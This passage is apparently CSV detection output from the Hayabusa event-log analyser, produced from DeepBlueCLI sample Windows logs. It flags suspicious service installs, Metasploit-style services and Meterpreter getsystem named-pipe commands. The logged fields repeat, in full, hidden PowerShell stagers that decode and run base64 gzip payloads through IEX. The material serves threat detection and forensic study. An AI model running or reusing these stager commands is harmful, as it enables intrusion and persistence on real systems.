bmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtS